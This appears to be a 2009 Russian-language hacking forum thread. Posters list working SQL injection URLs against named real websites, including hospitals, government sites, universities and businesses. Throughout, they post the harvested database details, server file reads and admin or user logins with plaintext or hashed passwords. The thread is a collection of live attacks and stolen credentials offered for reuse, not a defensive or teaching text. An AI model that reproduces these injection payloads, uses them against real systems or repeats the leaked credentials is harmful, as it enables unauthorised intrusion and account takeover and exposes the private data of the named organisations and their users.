Evil link: http://www.nasr.com.au/release.asp?NewsId=-31152+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--
Version: 4.1.22-community-nt
database: snet
user: root@localhost
OS: Windows Server 2003
Чтение файлов:
http://www.nasr.com.au/release.asp?NewsId=-31152+union+select+1,2,3,4,5,6,7,load_file(0x633a5 c626f6f742e696e69),9,10,11,12,13,14,15,16,17,18,19 ,20,21--
Где 0x633a5c626f6f742e696e69 - это c:\boot.ini в hex-представлении.
PR5
http://www.traffictechnologytoday.com/news.php?NewsID=-11440+union+select+1,2,3,concat_ws(0x3a,version(), database(),useR()),5,6,7,8,9,10
Database Version: 4.1.15-Debian_0.dotdeb.4-log
Database name: passenger
User name: passenger01@62.128.157.148
PR6
http://www.tropicalforesttrust.com/news-detail.php?newsid=-74+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),useR()),5,6,7,8,9,10,11,12,13,14
Database Version: 4.0.27-standard-log
Database name: db200813045
User name: dbo200813045@212.227.114.142
-m0rgan-
01.04.2009, 19:17
http://www.sottoilmare.it/archivionews.php?getid=-1+union+all+select+0,1,concat_ws(user(),version(), database()),3,4,5,6,7--+
юзер/версия/бд:
4.1.23-pro-gpl-logMV2696_sim@81.88.49.17sottoilmare_it_data
----------------------------------------------------------------------
http://www.senor.es/ingles/ver_novedades.php?idn=-1+union+all+select+concat_ws(user(),version(),data base()),1,2,3,4--
юзер/версия/бд:
5.0.45-community-ntsenor_usuario@localhostsenorbd
---------------------------------------------------------------------
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(user(),version(), database()),3,4,5,6,7,8,9,10--
юзер/версия/бд:
5.0.4532908_user116602@lnh-util.bluehalo.myregisteredsite.com32908_leadacidba tteryinfoorg
----------------------------------------------------------------------------------------
The End!
PR6
http://www.ethanol.org/news/index.php?newsid=-25+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8
Database Version: 5.0.77-community
Database name: ethanol_ethanol
User name: ethanol_ethanol@localhost
http://www.uniteck.ru/?type=-560+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8--
Database Version : 5.0.41-log
Database name : uniteck
User name : uniteck@cub.mplik.ru
админ :
http://www.uniteck.ru/?type=-560+union+select+1,2,3,concat_ws(0x3a,logi n,pass),5,6,7,8+from+user--
admin:683a6aad2b7543f113cf2ba32b42c2d8 - 1972oxa
вход с сайта (http://uniteck.ru)
PR5
http://www.gaspowered.com/newsletters.php?newsID=20+AND+ASCII(SUBSTRING((sel ect+y()),1,1))>x--
y1=version
y2=database
y3=user
x1=53,46,48,46,53,49,97,45,99,111,109,109,117,110, 105,116,121,45,108,111,103
x2=103,97,115,112,111,119,101,114
x3=103,97,115,112,111,119,101,114,64,108,111,99,97 ,108,104,111,115,116
Version : 5.0.51a-community-log
Database : gaspower
User : gaspower@localhost
PR4
http://www.ootpdevelopments.com/article.php?newsid=396+AND+SUBSTRING((y())1,1))=x
x=Version : 5.0.26
Database : misc
User : ootpdevmisc@localhost
M.W.N.N.
01.04.2009, 19:43
http://www.pna.gov.ph/index.php?idn=1&sid=&nid=1&rid=79746+union+select+1,2,3,concat(version(),0x3a ,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21/*
version()4.0.20a-nt
database():test
user():root@localhost
http://www.pna.gov.ph/index.php?idn=1&sid=&nid=1&rid=79746+union+select+1,2,3,concat(user,0x3a,pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1+from+mysql.user/*
__
http://www.contraloriabarrancabermeja.gov.co/article.php?sid=5+union+select+1,2,3,4,5,6,7,8,9,1 0,11
sarmat2009
01.04.2009, 20:07
http://www.ftsr.ru
http://www.ftsr.ru/news.php?news_id=-1+union+select+1,2,concat(0x3a,da tabase(),0x3a,user(),0x3a,version()),4,5,6,7--
ftsr139_2007
ftsr139_2007@v26.valuehost.ru
mysql 4.0.27-log
PR3
http://www.comeraghcc.com/DisplayArticle.php?newsID=-216+union+select+1,concat_ws(0x3a,version(),databa se(),useR()),3,4,5,6,7,8
Database Version: 5.0.51a-community
Database name: comerag_Comeragh
User name: comerag_cathal@localhost
PR3
http://architectureinc.com/news/index.php?newsid=-69+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8
Database Version: 5.0.45
Database name: architectureincdb
User name: architectureinc@localhost
PR3
http://www.prairieberry.com/news/index.php?newsid=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9
Database Version: 5.0.45
Database name: prairieberrydb
User name: prairieberry@localhost
KaMuKaDzE
01.04.2009, 21:17
http://www.zora.ru/?a=show&id=-147+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11--
version / 4.0.27-standard-log
database / zora
user / zora@localhost
http://www.unitedparts.ru/catalog.php?id=2+union+select+concat_ws(0x3a,versi on(),database(),user()),2,3,4--
version / 5.0.67-log
database / u44238_3
user / u44238@10.10.223.208
http://blackhillslots.com/news/?newsid=-5+UNION+SELECT+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8
Database Version: 5.0.45
Database name: blackhillslotsdb
User name: blackhillslots@localhost
http://midwestalarm.com/news/?newsid=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8
Database Version: 5.0.45
Database name: midwestalarmdb
User name: midwestalarm@localhost
http://klockwerkscycles.com/news.php?newsid=-194+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7
Database Version: 5.0.45-log
Database name: klockwerksdb
User name: klockwerks@localhost
http://studsovet.wl.dvgu.ru/index.php?id=-375+union+select+concat_ws(0x3a,user_login,user_pa ss,user_nicename,user_url,user_status)+from+wp_vi_ users--
database : 5.0.67
tables : wp_vi_users
log: admin
pass: admin
Australian Airports Association (pr5)
хакиры отакуют аэропорты (=
http://www.aaal.com.au/category.php?id=18+AND+ASCII(SUBSTRING((select+y() ),1,1))>x/*
y1=version
y2=database
y3=user
x1=52,46,49,46,49,49,45,68,101,98,105,97,110,95,52 ,115,97,114,103,100,55
x2=97,97,97,108
x3=97,105,114,112,111,114,116,115,64,108,111,99,97 ,108,104,111,115,116
version() - 4.1.11-Debian_4sargd7
database() - aaal
user() - airports@localhost
---------------------------------------------------------------------------------------------------------------
http://www.speedcarseries.com/news/index.php?newsid=-101+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11
Database Version: 5.0.41-community
Database name: speedcar
User name: speedcar@localhost
http://dtsf.com/news/index.php?newsid=-302+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6
Database Version: 5.0.45
Database name: dtsfdb
User name: dtsf@localhost
admin:incognito
http://signaturehomesllc.com/news/index.php?newsid=-20+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9,10
Database Version: 5.0.51a-3ubuntu5.4
Database name: signaturehomes
User name: signaturehomes@localhost
http://sfseminary.edu/news/index.php?newsid=-198+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8
Database Version: 5.0.45
Database name: sfseminary_edu
User name: sfseminary@localhost
Jokester они сменили базу и движок сайта, но скуля есть...не знаю если это можно считать бояном
http://truth-4-youth.net/news/index.php?newsid=-15+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9
Database Version: 4.1.22
Database name: truth4youthdb
User name: truth4youth@localhost
http://brookingshealth.org/news/?newsid=-214+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),useR()),6,7,8,9,10,11--
Database Version: 5.0.45
Database name: brookingshealthdb
User name: brookingshealth@localhost
http://huronregional.org/news/index.php?newsid=-401+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11,12,13&id=58
Database Version: 5.0.45
Database name: huronregionaldb
User name: huronregional@localhost
http://www.luvernecommunityhospital.org/news.php?newsid=-218+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8
Database Version: 5.0.45
Database name: sanfordluvernedb_new
User name: newsanford@localhost
http://nwiowahealthcenter.org/news.php?newsid=-75+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6
Database Version: 5.0.45
Database name: northwestiowadb
User name: northwestiowa@localhost
http://prairielakes.com/news/index.php?newsid=-417+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11--
Database Version: 5.0.45
Database name: prairielakesdb
User name: prairielakes@localhost
http://urgentcareemr.com/news/index.php?newsid=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9--
Database Version: 5.0.45
Database name: docutapdb
User name: docutap@localhost
http://www.sfsurgical.com/news/index.php?newsid=-5+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8,9
Database Version: 5.0.45
Database name: sfsurgicaldb
User name: sfsurgical@localhost
http://mywellnessadvantage.com/news/index.php?id=&newsid=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8,9
Database Version: 5.0.45
Database name: westernhealthdb
User name: westernhealth@localhost
http://www.welcoa.org/news.php?entryid=-489+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11,12,13,14,15
Database Version: 5.0.45
Database name: welcoadb
User name: welcoa@localhost
http://web-book.ru/index.php?page=details&book=-1+union+select+1,2,3,4,CONCAT_WS(0x2C,USER(),DATAB ASE(),VERSION()),6,7,8,9,10,11,12
dbuser: dbu_tyre1_1@192.168.7.19
dbname: db_tyre1_1
Version: 4.1.22-log
обед
http://ist.stmary.edu/alumni.php?alumniID=49+union+select+1,user(),3,4,5 ,6,7,8+limit+1,1/*
User:root
Version:5.0.27-community-nt
[ist.stmary.edu Не боян]
ps: для тех, кто будет искать пути ;-)
http://ist.stmary.edu/news/images/smilies/WS_FTP.LOG
=======================================
http://www.studentservices.aero.und.edu/f4_Jobs%20and%20Scholarships/view_job.php?JobID=1311+order+by+32/*
Version: 5.0.22
User: studentservices@mozart.aero.und.edu
Dbname: studentservices
table users:
asn:asn
salvesen:jubalon
henryb:henryb
amy:jake
kim:ecolab
tbarrett:tbear
http://www.studentservices.aero.und.edu/admin/index.php
AkyHa_MaTaTa
02.04.2009, 13:05
directrix.ru ТиЦ 2000 PR 3
http://directrix.ru/cat?tag=331212212121231+union+select+1,2,concat_ws (0x3A,user(),@@version,database()),4,5,6,7--+
user(): wwditrix@localhost
version(): 5.0.51a-17vc-log
database(): directrix
sql-blind
http://www.puppets.ru/index.php?id=85'+and+ascii(substring(version(),1,1 ))=53--+
database: 5.0.51
"Официальный сайт следственного управления Следственного комитета..."
http://www.skprok.tver.ru/news/?new_id=110+and+1=0+union+select+1,2,3,4,5,6,7,8,9 ,0--
molotovkeyt
02.04.2009, 18:34
Арт-ателье "Костюмер" + информационный портал "Костюмер"
http://www.kostumer.ru/biograph_SB.php3?m=6&id=-1+union+select+1,2,3,4/*
Database Version: 4.1.9-log
http://breadmaker.karasik.org/viewRecipe.php?ID=-10+union+select+1,unhex(hex(concat_ws(0xa,username ,user_password))),3,4,5,6,7,8,9+from+karasik_bread board.phpbb_users+limit+1,1--+
db: 5.0.67-msl-icd1-log
name_db: karasik_breadmaker
user: karasik@localhost
table: phpbb_users
database:karasik_breadboard
login: karasik
pass: kkkVVV
+limit+x,x--+
--------------------------------------------------
http://prazdnik.com.ua/index.php?id=54&pid=-35180'+union+select+concat_ws(0x3a,version(),datab ase(),user()),2--+
db: 5.0.44
name_db: newprazdnik
user: u_newprazdni@localhost
http://prazdnik.com.ua/admin/
log: prazdnik
pass: 12345
http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,version() ,da tabase(),user()),3,4,5,6,7,8,9,10,11,12--
Database Version : 5.0.67
Database name : saturn
User name : saturn@zvm11.host.ru
адм :
http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,name,pass wd),3,4,5,6,7,8,9,10,11,12+from+s_ users+limit+0,1--
sokolov_ка:wJwVyTMy_spr
moder:mashaalenamoders
саму админку не нашел :rolleyes:
-m0rgan-
02.04.2009, 21:00
http://www.hdtinfo.com/news/read.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4--
юзер/версия/бд:
news@localhost5.0.51a-logmmnews
.:[melkiy]:.
02.04.2009, 23:14
http://dornerworks.com/?p=news&id=-1+union+select+1,2,3--
Database Version: 5.0.67-community
Database name: pigvomit_dnwwebsite
User name: pigvomit_dorner@localhost
http://egyco-egypt.com/English/newsdetail.php?ID=-15+union+select+1,2,3,4--
Database Version: 5.0.77-community
Database name: egycoeg_egyco
User name: egycoeg_egyco@localhost
Login: egico
Pass:egico1
http://www.line.com.ua/magazin.php?id=-1+union+select+1,2,3--
Database Version: 5.0.51a-community
Database name: abook_line
User name: abook_linecom@localhost
Около 350 юзеров! Выводить всех юзеров не стал =)
http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.68-log
Database name: mistelle
User name: mistelle@10.0.75.182
Юзеры: http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,use rname),6,7+from+pun_users--
http://www.geotek.co.uk/site/scripts/news.php?id=-1+union+select+1,2,3,4,5,6--
Database Version: 4.0.24_Debian-10sarge2
Database name: geotekmain
User name: geotekmain@localhost
http://www.ecop.org.ph/news.php?id=-99+union+select+1,2,3,4,5--
Database Version: 4.1.22-standard-log
Database name: ecoporg_db
User name: ecoporg_user@localhost
http://windsurfing-by.org/news.php?id=-1+union+select+1,2,3,4,5,6,7,8--
Database Version: 5.0.32-Debian_7etch6-log
Database name: windsurf_com
User name: windsurf_user@localhost
http://www.dflvwclub.de/cars.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Database Version: 5032-debian_7etch8-log
Database name: aa34
User name: aa34@localhost
Login: admin
Pass: d9c4b5ac3b13e92e26b4e025586d8a8d : dflit
Выводить юзеров с форума с таблы phorum_users
<<ЙА-Xxa - Официальный сайт Рашида Нугманова>>
http://www.yahha.com/article.php?sid=-145+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8,9,10,11,12,13--+
db: 5.0.67-community
name_db: yahha_mpn
user: yahha_admin@localhost
table:mpn_authors , db: yahha_mpn
log: RN
pass: xer0mem
Это владелитц сайта (не админ, вход прямо с главной страницы)
-------------------------------------------------------------
limit+186,1--+
table: mpn_users
name: Андрей Дамер
log: damer
pass: 250676
+limit+X,x--+
все юзверы..........
--------------------------------------------------------------
На боян проверено в SQL Injections [AntiBoyan] CheckeR
Pr 4
http://campisis.us/locdetail.php?id=2 %26%26 1%3D2 UNION SELECT 1,CONCAT(0x6467797436,CONCAT_WS(0x203A20,VERSION() ,DATABASE(),USER()),0x3566646B68),3,4,5,6,7,8,9,10 ,11,12 %23
VERSION(),DATABASE(),USER()
4.1.22-max-log : campisis : campisis@72.167.131.114
==
PR3
http://hamercaz.com/hamercaz/site/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12--
5.0.22
==
.:[melkiy]:.
03.04.2009, 18:45
http://www.interbridge.ee/?lang=ru&what=news&id=-1+union+select+1,2,3--
Database Version: 5.0.32-Debian_7etch6-log
Database name: interbridge
User name: interbridge@localhost
http://www.spurway.ca/news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.0.22
Database name: pg_org_spurway
User name: spurway@localhost
http://www.fourwinds-rv.com/?page=news&id=-1+union+select+1,2,3,4,5--
Database Version: 4.1.7-log
Database name: fourwinds-rv
User name: databaseadmin@elk1.elkhart.net
Есть доступ к mysql.user
13 юзеров
Имхо, это админ! Пасс рута не выводит((
Login: adminatcomp
Pass:07d8ece224cf7ece : ???
Бильярд по-киевски
http://kiev.duplet.com.ua/?R=arhive&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22--
Database Version: 5.0.67-community-log
Database name: dupletc_kiev
User name: dupletc_kadm@localhost
<<Официальный сайт, футбольного клуба "КаМаЗ" >>
http://www.fckamaz.ru/pages/news.php?id=-472+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8+from+information_schema.colum ns+where+column_name+like+0x70617373776f7264--+
db: 5.0.75
name_db: fckamazru
user: fckamazru@78.108.81.121
-------------------
http://www.fckamaz.ru/admin
-------------------
table: wp_users , db: fckamazru_wordpress
log: admin
pass: 03ecc478f8949ec82c3b4a6fcecd0305 :(
-------------------
table: users
log: Спарк
pass: sdfsdt34t34
+limit+x,x--+
-------------------
table: users2007
log: Спарк - (Администратор сайта)
pass: nw21
+limit+x,x--+
--------------------------------------------
--------------------------------------------
http://www.krainamriy.com/news.php?id=-46+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11--+
db: 4.1.22-log
name_db: krainamriy
user: krainamriy@localhost
PR 7
http://www.icimod.org/enews/custom.page.php?id=-1+union+select+1,version()--
4.1.22-standard
M.W.N.N.
03.04.2009, 21:25
http://www.cultura.mt.gov.br/conteudo.php?sid=54&cid=543++union+select+1,2,3,4,5,6,7,concat(version (),0x3a,database(),0x3a,user()),9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+ limit+1,1/*
version():4.1.22-standard-log
database():MYSDCP02
user():SDC_User2@192.168.0.4
__
http://www.stips.minpolj.sr.gov.yu/print.php?sid=2+union+select+concat(version(),0x3a ,database(),0x3a,user()),2,3,4,5,6+limit+1,1/*
version():5.0.44-debug-log
database():minmiss
user():minmiss@localhost
__
http://glastonbury.gov.uk/g_gov/article.php?op=Print&sid=377+union+select+1,2,concat(version(),0x3a,dat abase(),0x3a,user()),4,5,6,7,8+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():glastonb
user():glastonb@localhost
__
http://www.bushnell.illinois.gov/newsStory.php?NewsID=11%27+union+select+1,2,3,4,5, concat(version(),0x3a,database(),0x3a,user()),7,8, 9,10,11,12,13,14/*
version():4.1.20
database():ci_bushnell_illinois_gov_-_data
user():bushnell@localhost
-m0rgan-
03.04.2009, 21:57
http://www.priefert.com.au/newsDetail.php?ID=-1+union+all+select+0,1,concat_ws(0x3c62723e,versio n(),user(),database()),3--
юзер/версия/бд:
priefert_admin@srv19.ezyreg.com
4.1.22-standard
priefert_products
-----------------------------------------------------------------------
http://www.viewsonic.com.au/pr/show.php?id=-1+union+all+select+0,1,2,concat_ws(0x3c62723e,user ,password,file_priv),4,5,6,7,8+from+mysql.user--
логин/пасс:
root
750ce2a25a8d1ad5
file_priv:Y
http://www.viewsonic.com.au/pr/show.php?id=-1+union+all+select+0,1,2,concat_ws(0x3c62723e,user (),version(),database()),4,5,6,7,8+from+mysql.user--
юзер/версия/бд:
web@localhost 4.1.22-log vsau
-----------------------------------------------------------------------
The End!
http://www.psicodietnews.org/page.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4 ,5+from+administrator--
http://www.psicodietnews.org/admin/admin.php
Льется шел )
pr5
http://www.menzelinsk.ru/average_special_educational.php?average=999+union+ select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14, 15--
tabl:
a_ad_users(login,pass)
chelnyclub : club (только одна запись, админку не нашел =( )
a_nla07_users (login,pass)
version() 5.0.67-log
user() u23836@10.10.10.201
database() u23836
pr4
http://www.moretonisland.com.au/product.php?id=67764+union+select+1,2,concat_ws(ch ar(32,32),version(),user(),database()),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30--
version() 4.0.17
user() moreton@localhost
database() moreton
pr5
http://www.antarvictoria.org.au/local-group.php?id=9999+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13+from+information_schema.tables +limit+18,1--
version() 5.0.67
user() antarvic_l_user@localhost
database() antarvic_local
pr4
http://www.qcal.org.au/seminars/event.php?ID=9999+union+select+1,2,version(),4,5,6 ,7,8,9,10,11,12,13--
version() 4.1.22-standard-log
user() qca7919_public@localhost
database() qca7919_QCAL
pr4
http://www.volzsky.ru/categ.php?id=9999+union+select+1,concat_ws(char(32 ,32),version(),user(),database())--
version() 5.1.32-community-log
user() Wx1000_volzskij@194.176.118.38
database() Wx1000_volzskij
pr3
http://www.countrywide.net.au/view_distributor.php?id=999+union+select+1,CONCAT( username, CHAR(32,58,32), password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38+from+auth/*&cadellt
/admin/index.php
cwdadmin : countrywide1
version() 4.0.27-standard
user() country_countryw@localhost
database() country_countrywide
pr5
http://www.velikieluki.ru/struc/struc2_d.php?struc2_id=9999+union+select+0,concat_ ws(char(32,32),version(),user(),database()),userna me,%20CHAR(32,58,32),%20user_password),2,3,4,5--&struc_id=2
version() 5.0.27-log
user() velikieluki@localhost
database() velikieluki
и на последок PostgreSQL
pr5
http://nursing.flinders.edu.au/research/index.php?id=108'+union+select+1,version(),null,nu ll,null,null,null,null,null,null,null,null,null,nu ll--
version() - PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
current_user() - nursstaff
current_database() - nursing
Cennarios
03.04.2009, 23:03
http://www.allcolombiangirls.com/detail.php?code=-1+union+select+1,2,concat_ws(0x3a3a,uname,confirmk ey),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+s ignup+limit+21,1--
Для страждущих. Бабы =)))
http://cleveland.dbusinessnews.com/shownews.php?newsid=124409+union+select+unhex(hex( concat_ws(0x3a,version(),database(),user()))),2,3, 4,5,6,7/*&type_news=latest
Database Version: 4.1.11
Database name: dbusinessnews_db
User name: dbnewsdbadmin@localhost
Уязвимость присутствует во всех этих ресурсах...
advertising-pr.dbusinessnews.com [66.129.105.20]
advertising-pr.dbusinessnews.com [66.129.105.20]
airline.dbusinessnews.com [66.129.105.20]
airline.dbusinessnews.com [66.129.105.20]
albany.dbusinessnews.com [66.129.105.20]
albany.dbusinessnews.com [66.129.105.20]
anchorage.dbusinessnews.com [66.129.105.20]
anchorage.dbusinessnews.com [66.129.105.20]
atlanta.dbusinessnews.com [66.129.105.20]
atlanta.dbusinessnews.com [66.129.105.20]
atlanta.triangle.dbusinessnews.com [66.129.105.20]
atlanta.triangle.dbusinessnews.com [66.129.105.20]
augusta.dbusinessnews.com [66.129.105.20]
augusta.dbusinessnews.com [66.129.105.20]
austin.dbusinessnews.com [66.129.105.20]
austin.dbusinessnews.com [66.129.105.20]
automotive.dbusinessnews.com [66.129.105.20]
automotive.dbusinessnews.com [66.129.105.20]
baltimore.dbusinessnews.com [66.129.105.20]
baltimore.dbusinessnews.com [66.129.105.20]
banking.dbusinessnews.com
banking.dbusinessnews.com
billings.dbusinessnews.com
birmingham.dbusinessnews.com
birmingham.dbusinessnews.com
bismarck.dbusinessnews.com
bismarck.dbusinessnews.com
boise.dbusinessnews.com
boise.dbusinessnews.com
boston.dbusinessnews.com
boston.dbusinessnews.com
charleston.dbusinessnews.com
charleston.dbusinessnews.com
charlotte.dbusinessnews.com
charlottte.dbusinessnews.com
charlottte.dbusinessnews.com
cheyenne.dbusinessnews.com
cheyenne.dbusinessnews.com
chicago.dbusinessnews.com
chicago.dbusinessnews.com
cincinnati.dbusinessnews.com
cincinnati.dbusinessnews.com
columbia.dbusinessnews.com
columbia.dbusinessnews.com
columbus.dbusinessnews.com
columbus.dbusinessnews.com
computers.dbusinessnews.com
computers.dbusinessnews.com
concord.dbusinessnews.com
concord.dbusinessnews.com
crm.dbusinessnews.com
crm.dbusinessnews.com
dallas.dbusinessnews.com
dayton.dbusinessnews.com
dayton.dbusinessnews.com
demo.dbusinessnews.com
demo.dbusinessnews.com
denver.dbusinessnews.com
denver.dbusinessnews.com
desmoines.dbusinessnews.com
desmoines.dbusinessnews.com
detroit.dbusinessnews.com
detroit.dbusinessnews.com
doston.dbusinessnews.com
doston.dbusinessnews.com
education.dbusinessnews.com
education.dbusinessnews.com
electronics.dbusinessnews.com
electronics.dbusinessnews.com
engineering.dbusinessnews.com
engineering.dbusinessnews.com
food-beverage.dbusinessnews.com
gaming.dbusinessnews.com
gaming.dbusinessnews.com
hartford.dbusinessnews.com
hartford.dbusinessnews.com
healthcare.dbusinessnews.com
honolulu.dbusinessnews.com
honolulu.dbusinessnews.com
hospitality.dbusinessnews.com
hospitality.dbusinessnews.com
houston.dbusinessnews.com
houston.dbusinessnews.com
indianapolis.dbusinessnews.com
indianapolis.dbusinessnews.com
indianapolis.indianapolis.dbusinessnews.com
indianapolis.indianapolis.dbusinessnews.com
information-technology.atlanta.dbusinessnews.com
information-technology.atlanta.dbusinessnews.com
internet.dbusinessnews.com
internet.dbusinessnews.com
jackson.dbusinessnews.com
jacksonville.dbusinessnews.com
jacksonville.dbusinessnews.com
kansas.dbusinessnews.com
kansas.dbusinessnews.com
kansascity.dbusinessnews.com
kansascity.dbusinessnews.com
lasvegas.dbusinessnews.com
lasvegas.dbusinessnews.com
legal-services.dbusinessnews.com
legal-services.dbusinessnews.com
life-sciences.dbusinessnews.com
life-sciences.dbusinessnews.com
losangeles.dbusinessnews.com
losangeles.dbusinessnews.com
louisville.dbusinessnews.com
louisville.dbusinessnews.com
management.dbusinessnews.com
management.dbusinessnews.com
manufacturing.dbusinessnews.com
manufacturing.dbusinessnews.com
memphis.dbusinessnews.com
metals-industry.dbusinessnews.com
metals-industry.dbusinessnews.com
milwaukee.dbusinessnews.com
milwaukee.dbusinessnews.com
minneapolis.dbusinessnews.com
minneapolis.dbusinessnews.com
montpelier.dbusinessnews.com
montpelier.dbusinessnews.com
nashville.dbusinessnews.com
nashville.dbusinessnews.com
newark.dbusinessnews.com
newark.dbusinessnews.com
neworleans.dbusinessnews.com
newyork.dbusinessnews.com
newyork.dbusinessnews.com
non-profit-news.dbusinessnews.com
non-profit-news.dbusinessnews.com
oklahomacity.dbusinessnews.com
oklahomacity.dbusinessnews.com
omaha.dbusinessnews.com
omaha.dbusinessnews.com
orangecounty.dbusinessnews.com
orangecounty.dbusinessnews.com
orlando.dbusinessnews.com
orlando.dbusinessnews.com
pharmaceuticals.dbusinessnews.com
pharmaceuticals.dbusinessnews.com
philadelphia.dbusinessnews.com
philadelphia.dbusinessnews.com
phoenix.dbusinessnews.com
phoenix.dbusinessnews.com
pittsburgh.dbusinessnews.com
portland.dbusinessnews.com
portland.dbusinessnews.com
potomac.dbusinessnews.com
potomac.dbusinessnews.com
providence.dbusinessnews.com
providence.dbusinessnews.com
real-estate.dbusinessnews.com
real-estate.dbusinessnews.com
retail.dbusinessnews.com
retail.dbusinessnews.com
richmond.dbusinessnews.com
richmond.dbusinessnews.com
sacramento.dbusinessnews.com
sacramento.dbusinessnews.com
sales-marketing.dbusinessnews.com
sales-marketing.dbusinessnews.com
saltlakecity.dbusinessnews.com
sanantonio.dbusinessnews.com
sanantonio.dbusinessnews.com
sanfran.dbusinessnews.com
sanfran.dbusinessnews.com
sanfrancisco.dbusinessnews.com
sanfrancisco.dbusinessnews.com
sanjose.dbusinessnews.com
sanjose.dbusinessnews.com
seattle.dbusinessnews.com
seattle.dbusinessnews.com
software.dbusinessnews.com
software.dbusinessnews.com
southflorida.dbusinessnews.com
southflorida.dbusinessnews.com
stlouis.dbusinessnews.com
stlouis.dbusinessnews.com
tampa.dbusinessnews.com
tampa.dbusinessnews.com
telecom-wireless.dbusinessnews.com
telecom-wireless.dbusinessnews.com
trade-professional-services.dbusinessnews.com
trade-professional-services.dbusinessnews.com
triad.dbusinessnews.com
triad.dbusinessnews.com
triangle.atlanta.dbusinessnews.com
triangle.dbusinessnews.com
triangle.dbusinessnews.com
triangle.triangle.dbusinessnews.com
venture-capital.dbusinessnews.com
venture-capital.dbusinessnews.com
wichita.dbusinessnews.com
wichita.dbusinessnews.com
wilmington.dbusinessnews.com
wilmington.dbusinessnews.com
www.dbusinessnews.com
www.dbusinessnews.com
http://www.liguegolf-limousin.org/page/page.php?id=-1+union+select+1,2,concat_ws(0x3a,login_utilisateu r,pwd_utilisateur),4,5+from+utilisateur--
http://www.liguegolf-limousin.org/infos_club/login.php
<<Ботаника>>
http://www.noviyegrani.com/subjects.php?ID=-223'+union+select+1,column_name,3,4,5,6,7,8,9+from +information_schema.columns+where+table_name='_kul lanicilar'--+
db: 5.0.45
name_db: noviye
user: noviye@localhost
log: sinantr
pass: 46ab172f44d6dfed
log: kerem37
pass: 0e5360d8365b0c67
----------------------------------
----------------------------------
http://www.fontaene-verlag.de/book.php?ID=-20'+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
db: 5.0.45
name_db: kaynak_verlag2
user: kulturyabanci@localhost
--------------------------------
--------------------------------
http://www.multi-master.ru/service/detail.php?id=-10+union+select+1,2,version(),4,5,6,7,8--+
db: 4.0.25-standard
name_db: multi72_base
user: multi72_admin@web8.100mb.net
Cennarios
04.04.2009, 14:49
http://www.usjf.net/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,concat_ws(0x3a3a,pn_uname,pn_pass ,pn_user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+nuke_users+limit+0,1/*
Греьаные америкосы...
